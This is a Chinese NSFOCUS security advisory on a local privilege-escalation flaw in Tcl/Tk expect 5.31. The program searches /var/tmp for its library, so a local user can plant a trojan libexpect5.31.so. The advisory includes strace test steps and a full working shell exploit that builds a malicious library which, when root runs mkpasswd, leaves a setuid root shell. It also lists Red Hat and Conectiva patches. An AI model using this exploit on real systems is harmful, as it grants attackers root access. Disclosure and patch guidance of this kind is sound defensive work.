首页 -> 安全研究
安全研究
绿盟月刊
绿盟安全月刊->第34期->最新漏洞
日期:2002-08-16
发布日期:2001-07-19
更新日期:2002-08-14
受影响系统:
TCL/TK expect 5.31
- Conectiva Linux 7.0
- Conectiva Linux 6.0
- RedHat Linux 7.1
- RedHat Linux 7.0
不受影响系统:
TCL/TK expect 5.32
- Conectiva Linux 7.0
- Conectiva Linux 6.0
- RedHat Linux 7.1
- RedHat Linux 7.0
描述:
--------------------------------------------------------------------
BUGTRAQ ID: 3074
CVE(CAN) ID: CAN-2001-1374
Tcl是一种流行的命令编程语言,可以很方便地利用它来向一些交互程序发布命令。它还包括一个库软件包,里面包括Tcl语言解释器、实现内置Tcl命令的例程、以及一些扩展功能。TK是Tcl的一个扩展,用来为程序员提供一个与X11 Windows系统的编程接口。一些Linux系统带的Tcl/Tk开发环境中含有一些应用程序:tcl、tk、tix、tclX、expect和itcl。
Tcl/tk软件包中所带的expect应用程序5.32之前版本在搜索自己的库文件时采用了不安全的搜索路径,可能允许本地用户提升权限。
expect在搜索其它目录之前会首先在一个临时目录/var/tmp下搜索自己的库libexpect5.31.so,如果这个目录下库文件存在且有效,Expect就会加载这个库。本地用户可以在该目录下创建一个木马库程序。当其他用户(例如root用户)调用任何使用expect的程序时,就可能执行攻击者指定的任意代码。某些Linux系统所带的mkpasswd程序就使用expect来为用户创建随机口令,当root用户调用mkpasswd时,攻击者就可能获取本地root权限。
<*来源:zen-parse (zen-parse@gmx.net)
链接:https://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=28224
https://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=22187
https://www.redhat.com/support/errata/RHSA-2002-148.html
http://distro.conectiva.com.br/atualizacoes/?id=a&anuncio=000409
*>
测试方法:
----------------------------------------------------------------------
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
zen-parse (zen-parse@gmx.net)提供了如下测试方法:
[root@clarity /tmp]# strace -o /tmp/twall expect </dev/null
[root@clarity /tmp]# grep -n /tmp/ /tmp/twall
5:open("/var/tmp/tcltk-root/usr/lib/i686/mmx/libexpect5.31.so", O_RDONLY) =
-1 ENOENT (No such file or directory)
6:stat64("/var/tmp/tcltk-root/usr/lib/i686/mmx", 0xbfffec4c) = -1 ENOSYS
(Function not implemented)
7:stat("/var/tmp/tcltk-root/usr/lib/i686/mmx", 0xbfffeb6c) = -1 ENOENT (No
such file or directory)
8:open("/var/tmp/tcltk-root/usr/lib/i686/libexpect5.31.so", O_RDONLY) = -1
ENOENT (No such file or directory)
9:stat("/var/tmp/tcltk-root/usr/lib/i686", 0xbfffeb6c) = -1 ENOENT (No such
file or directory)
10:open("/var/tmp/tcltk-root/usr/lib/mmx/libexpect5.31.so", O_RDONLY) = -1
ENOENT (No such file or directory)
11:stat("/var/tmp/tcltk-root/usr/lib/mmx", 0xbfffeb6c) = -1 ENOENT (No such
file or directory)
12:open("/var/tmp/tcltk-root/usr/lib/libexpect5.31.so", O_RDONLY) = -1
ENOENT (No such file or directory)
13:stat("/var/tmp/tcltk-root/usr/lib", 0xbfffeb6c) = -1 ENOENT (No such
file or directory)
[root@clarity /tmp]#
如果恶意用户在/var/tmp/tcltk-root/usr/lib/i686/mmx/目录下创建一个包含木马代码的
libexpect5.31.so库文件,就可能被加载执行。
[root@clarity /tmp]# su evil
[evil@clarity /tmp]$ mkdirhier /var/tmp/tcltk-root/usr/lib/i686/mmx/ [evil@clarity /tmp]$ touch /var/tmp/tcltk-root/usr/lib/i686/mmx/libexpect5.31.so
[evil@clarity /tmp]$ exit
[root@clarity /tmp]# strace -o /tmp/twall expect </dev/null
[root@clarity /tmp]# grep -n /tmp/ /tmp/twall
5:open("/var/tmp/tcltk-root/usr/lib/i686/mmx/libexpect5.31.so", O_RDONLY) =
4
[root@clarity /tmp]# more /tmp/twall
execve("/usr/bin/expect", ["expect"], [/* 29 vars */]) = 0
uname({sys="Linux", node="clarity", ...}) = 0
brk(0) = 0x8049c90
open("/etc/ld.so.preload", O_RDONLY) = -1 ENOENT (No such file or
directory)
open("/var/tmp/tcltk-root/usr/lib/i686/mmx/libexpect5.31.so", O_RDONLY) = 4
read(4, "", 1024) = 0
close(4) = 0
--- SIGSEGV (Segmentation fault) ---
+++ killed by SIGSEGV +++
[root@clarity /tmp]#
zen-parse(zen-parse@gmx.net) 提供了如下测试程序:
#!/bin/sh
# Trivial exploit to gain access as user who tries to run
# expect script...
# Places a trojan library in /var/tmp/tcltk-root/usr/lib/
# and execs arbitrary commands as the calling user...
# eg: bash-2.04$ ./mkpasswd
# *wait*
# elsewhere:
# bash-2.04# adduser newuser;mkpasswd newuser
# *suddenly the screen clears*
# back at the evil users place:
# bash-2.04$ /tmp/ashen
# bash-2.04# id
# uid=0(root) gid=0(root) groups=500(evil)
# bash-2.04#
# please fix this bug?
cd /tmp
cat >libexpect.c <<EOF
exp_parse_argv(){execl("/bin/sh","sh","-c","clear;echo "
"'main(){setreuid(geteuid(),geteuid());setregid(getegid(),getegid());"
" execl(\"/bin/bash\",\"bash\",0);}'"
">/tmp/ashen.c;cc -O -o /tmp/ashen /tmp/ashen.c;"
"chmod 6711 /tmp/ashen;rm /tmp/ashen.c",0);}
exp_interactive(){}exp_cmdfilename(){}exp_interpreter()
{}exp_cmdfile(){}Expect_Init(){}
EOF
cc -c libexpect.c;ld --shared libexpect.o -o libexpect.so
mkdirhier /var/tmp/tcltk-root/usr/lib/
cp -f libexpect.so /var/tmp/tcltk-root/usr/lib/libexpect5.31.so
rm -f libexpect.o libexpect.so libexpect libexpect.c
echo "Now wait until someone runs mkpasswd (or something else with expect)"
建议:
---------------------------------------------------------------------
临时解决方法:
如果您不能立刻安装补丁或者升级,NSFOCUS建议您采取以下措施以降低威胁:
* 不要运行任何调用expect的程序,例如mkpasswd。
厂商补丁:
Conectiva
---------
Conectiva已经为此发布了一个安全公告(CLA-2001:409)以及相应补丁:
CLA-2001:409:Insecure runtime library search path
链接:http://distro.conectiva.com.br/atualizacoes/?id=a&anuncio=000409
补丁下载:
tp://atualizacoes.conectiva.com.br/6.0/SRPMS/tcltk-8.3.2-2U60_2cl.src.rpm
ftp://atualizacoes.conectiva.com.br/6.0/RPMS/tcl-8.3.2-2U60_2cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/6.0/RPMS/tix-4.1.0.6.1-2U60_2cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/6.0/RPMS/itcl-3.1.0-2U60_2cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/6.0/RPMS/tcllib-0.4-2U60_2cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/6.0/RPMS/tk-8.3.2-2U60_2cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/6.0/RPMS/tclx-8.3.2-2U60_2cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/6.0/RPMS/expect-5.32-2U60_2cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/7.0/SRPMS/tcltk-8.3.3-4U70_1cl.src.rpm
ftp://atualizacoes.conectiva.com.br/7.0/RPMS/tix-demos-4.1.0.6.1-4U70_1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/7.0/RPMS/expect-devel-5.32-4U70_1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/7.0/RPMS/expect-5.32-4U70_1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/7.0/RPMS/expect-devel-static-5.32-4U70_1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/7.0/RPMS/itcl-iwidgets2.2.0-demos-3.1.0-4U70_1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/7.0/RPMS/tix-4.1.0.6.1-4U70_1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/7.0/RPMS/tclx-devel-8.3.3-4U70_1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/7.0/RPMS/tk-devel-8.3.3-4U70_1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/7.0/RPMS/tk-devel-static-8.3.3-4U70_1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/7.0/RPMS/tclx-devel-static-8.3.3-4U70_1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/7.0/RPMS/itcl-devel-static-3.1.0-4U70_1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/7.0/RPMS/tclx-8.3.3-4U70_1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/7.0/RPMS/tix-devel-static-4.1.0.6.1-4U70_1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/7.0/RPMS/tclx-helpfiles-8.3.3-4U70_1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/7.0/RPMS/itcl-3.1.0-4U70_1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/7.0/RPMS/tcl-devel-static-8.3.3-4U70_1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/7.0/RPMS/tk-demos-8.3.3-4U70_1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/7.0/RPMS/itcl-devel-3.1.0-4U70_1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/7.0/RPMS/tcllib-0.8-4U70_1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/7.0/RPMS/tcl-devel-8.3.3-4U70_1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/7.0/RPMS/tk-8.3.3-4U70_1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/7.0/RPMS/tcl-8.3.3-4U70_1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/7.0/RPMS/tix-devel-4.1.0.6.1-4U70_1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/7.0/RPMS/itcl-iwidgets-demos-3.1.0-4U70_1cl.i386.rpm
Conectiva Linux version 6.0及以上版本的用户可以使用apt进行RPM包的更新:
- 把以下的文本行加入到/etc/apt/sources.list文件中:
rpm [cncbr] ftp://atualizacoes.conectiva.com.br 6.0/conectiva updates
(如果你不是使用6.0版本,用合适的版本号代替上面的6.0)
- 执行: apt-get update
- 更新以后,再执行: apt-get upgrade
RedHat
------
RedHat已经为此发布了一个安全公告(RHSA-2002:148-06)以及相应补丁:
RHSA-2002:148-06:Updated Tcl/Tk packages fix local vulnerability
链接:https://www.redhat.com/support/errata/RHSA-2002-148.html
补丁下载:
Red Hat Linux 7.0:
SRPMS:
ftp://updates.redhat.com/7.0/en/os/SRPMS/tcltk-8.3.3-69.src.rpm
alpha:
ftp://updates.redhat.com/7.0/en/os/alpha/expect-5.32.2-69.alpha.rpm
ftp://updates.redhat.com/7.0/en/os/alpha/itcl-3.2-69.alpha.rpm
ftp://updates.redhat.com/7.0/en/os/alpha/tcl-8.3.3-69.alpha.rpm
ftp://updates.redhat.com/7.0/en/os/alpha/tcllib-1.0-69.alpha.rpm
ftp://updates.redhat.com/7.0/en/os/alpha/tclx-8.3-69.alpha.rpm
ftp://updates.redhat.com/7.0/en/os/alpha/tix-8.2.0b1-69.alpha.rpm
ftp://updates.redhat.com/7.0/en/os/alpha/tk-8.3.3-69.alpha.rpm
i386:
ftp://updates.redhat.com/7.0/en/os/i386/expect-5.32.2-69.i386.rpm
ftp://updates.redhat.com/7.0/en/os/i386/itcl-3.2-69.i386.rpm
ftp://updates.redhat.com/7.0/en/os/i386/tcl-8.3.3-69.i386.rpm
ftp://updates.redhat.com/7.0/en/os/i386/tcllib-1.0-69.i386.rpm
ftp://updates.redhat.com/7.0/en/os/i386/tclx-8.3-69.i386.rpm
ftp://updates.redhat.com/7.0/en/os/i386/tix-8.2.0b1-69.i386.rpm
ftp://updates.redhat.com/7.0/en/os/i386/tk-8.3.3-69.i386.rpm
Red Hat Linux 7.1:
SRPMS:
ftp://updates.redhat.com/7.1/en/os/SRPMS/tcltk-8.3.3-69.src.rpm
alpha:
ftp://updates.redhat.com/7.1/en/os/alpha/expect-5.32.2-69.alpha.rpm
ftp://updates.redhat.com/7.1/en/os/alpha/itcl-3.2-69.alpha.rpm
ftp://updates.redhat.com/7.1/en/os/alpha/tcl-8.3.3-69.alpha.rpm
ftp://updates.redhat.com/7.1/en/os/alpha/tcllib-1.0-69.alpha.rpm
ftp://updates.redhat.com/7.1/en/os/alpha/tclx-8.3-69.alpha.rpm
ftp://updates.redhat.com/7.1/en/os/alpha/tix-8.2.0b1-69.alpha.rpm
ftp://updates.redhat.com/7.1/en/os/alpha/tk-8.3.3-69.alpha.rpm
i386:
ftp://updates.redhat.com/7.1/en/os/i386/expect-5.32.2-69.i386.rpm
ftp://updates.redhat.com/7.1/en/os/i386/itcl-3.2-69.i386.rpm
ftp://updates.redhat.com/7.1/en/os/i386/tcl-8.3.3-69.i386.rpm
ftp://updates.redhat.com/7.1/en/os/i386/tcllib-1.0-69.i386.rpm
ftp://updates.redhat.com/7.1/en/os/i386/tclx-8.3-69.i386.rpm
ftp://updates.redhat.com/7.1/en/os/i386/tix-8.2.0b1-69.i386.rpm
ftp://updates.redhat.com/7.1/en/os/i386/tk-8.3.3-69.i386.rpm
ia64:
ftp://updates.redhat.com/7.1/en/os/ia64/expect-5.32.2-69.ia64.rpm
ftp://updates.redhat.com/7.1/en/os/ia64/itcl-3.2-69.ia64.rpm
ftp://updates.redhat.com/7.1/en/os/ia64/tcl-8.3.3-69.ia64.rpm
ftp://updates.redhat.com/7.1/en/os/ia64/tcllib-1.0-69.ia64.rpm
ftp://updates.redhat.com/7.1/en/os/ia64/tclx-8.3-69.ia64.rpm
ftp://updates.redhat.com/7.1/en/os/ia64/tix-8.2.0b1-69.ia64.rpm
ftp://updates.redhat.com/7.1/en/os/ia64/tk-8.3.3-69.ia64.rpm
可使用下列命令安装补丁:
rpm -Fvh [文件名]
版权所有,未经许可,不得转载